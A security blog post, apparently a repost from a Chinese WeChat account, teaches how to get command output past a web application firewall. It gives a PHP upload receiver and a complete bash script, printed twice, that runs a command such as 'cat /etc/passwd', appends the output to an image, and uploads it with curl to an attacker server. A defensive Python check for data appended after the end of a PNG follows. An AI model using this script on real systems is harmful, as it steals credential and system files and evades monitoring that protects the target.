Command execution: getting past the firewall and keeping commands running

鸿鹄实验室
Published 2021-04-15 10:46:34
This article is collected in the column: 鸿鹄实验室

Everyone is off on holiday, so the public account naturally has to keep up its pace of updates. Today's post is a small command-execution trick.

In real engagements we often run into command-execution vulnerabilities, but with WAFs everywhere now, some of the commands we try to run get blocked outright: run `cat /etc/passwd`, for example, and the WAF intercepts the keyword, so the command never succeeds. Something like the screenshot below.

It is blocked by the WAF straight away. If the target has outbound network access, we can use the following method to get around this. The idea is roughly as follows:

Have the target reach out to a PHP service we control, write the command's output into an image, and then open the image to read the result of the command.

The concrete steps are as follows:

First we need a PHP file with the following content:

<?php
    $file = date("dHis") . ".png";
    move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>

We also need a script that makes the request and runs the command:

#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# The command to be executed; its output is embedded in the photo.
# Single quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement on the value of the useEncrypt variable.
# If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluate the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will upload the image to the attacker's PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

Next we change exfilData to the command we want to run, exfilSite to the address of your PHP site, and tmpImage to the URL of an image (I simply use a Baidu image here). useEncrypt decides whether the output is encrypted: 1 encrypts it with the password above, 0 sends it unencrypted.

After the changes it looks like this:

#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# The command to be executed; its output is embedded in the photo.
# Single quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='cat /etc/passwd'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://192.168.0.107/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='0'

# An `if` statement on the value of the useEncrypt variable.
# If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluate the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will upload the image to the attacker's PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

Then start a web server:

Then, playing the attacker, run the script; the server receives the request:

The server produces the image; opening it shows the output of the command:
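From the defender's side, what gives this trick away is structural rather than content-based: the script appends the output after a complete image file, so the upload still begins like a valid PNG but carries bytes past the IEND chunk. The following Python check is added here as an example; it is not part of the original post or of the null-byte script. It walks the PNG chunk list, reports any trailer after IEND, and notes whether that trailer looks like text (as it does for both the plain and the base64-encoded encrypted variant). The sample image and the appended text are constructed inline, and the function names (png_image_end, trailing_bytes, inspect_upload) are this example's own.

```python
import struct
import zlib
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_minimal_png() -> bytes:
    """A valid 1x1 8-bit grayscale PNG, constructed here as sample input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 followed by one pixel
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b""))


def png_image_end(data: bytes) -> Optional[int]:
    """Walk the chunk list and return the offset just past the IEND chunk.
    Returns None when the data is not a well-formed PNG (bad signature,
    truncated chunk, or no IEND); callers should treat that as suspect too."""
    if not data.startswith(PNG_SIGNATURE):
        return None
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length  # length field + type + data + CRC
        if end > len(data):
            return None
        if ctype == b"IEND":
            return end
        pos = end
    return None


def trailing_bytes(data: bytes) -> Optional[bytes]:
    """Bytes that follow the IEND chunk (b"" for a clean file), or None
    when the input could not be parsed as a PNG at all."""
    end = png_image_end(data)
    return None if end is None else data[end:]


def looks_like_text(blob: bytes, threshold: float = 0.9) -> bool:
    """True when at least `threshold` of the bytes are printable ASCII or
    whitespace. Plain command output and base64 both satisfy this."""
    if not blob:
        return False
    ok = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(blob) >= threshold


def inspect_upload(data: bytes, max_trailer: int = 0) -> dict:
    """Classify an uploaded PNG. A trailer longer than max_trailer bytes is
    flagged regardless of its content; text_like is informational only."""
    trailer = trailing_bytes(data)
    if trailer is None:
        return {"verdict": "unparsed", "trailer_len": 0, "text_like": False}
    verdict = "flagged" if len(trailer) > max_trailer else "clean"
    return {"verdict": verdict, "trailer_len": len(trailer),
            "text_like": looks_like_text(trailer)}


if __name__ == "__main__":
    clean = make_minimal_png()
    # Mimic what the post's script does: "\n\n" and then the output, appended.
    smuggled = clean + b"\n\n" + b"constructed command output line\n"
    for name, blob in (("clean", clean), ("smuggled", smuggled)):
        print(name, inspect_upload(blob))
```

This belongs wherever uploads are already unpacked, at the upload handler or at an egress inspection point that parses multipart bodies. The trigger is the mere presence of a trailer, not what it contains, so the encrypted variant (useEncrypt='1'), whose base64 output is still appended in the same way, is caught identically. JPEG files are deliberately left out: a search for the EOI marker is not enough, because EXIF thumbnails carry their own EOI, so a JPEG check has to walk the segment headers instead.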

Reference:

https://null-byte.wonderhowto.com/how-to/hacking-macos-use-images-smuggle-data-through-firewalls-0197128/

This article takes part in the Tencent Cloud self-media sync exposure program and is shared from the 鸿鹄实验室 WeChat public account. Originally published: 2020-07-04.

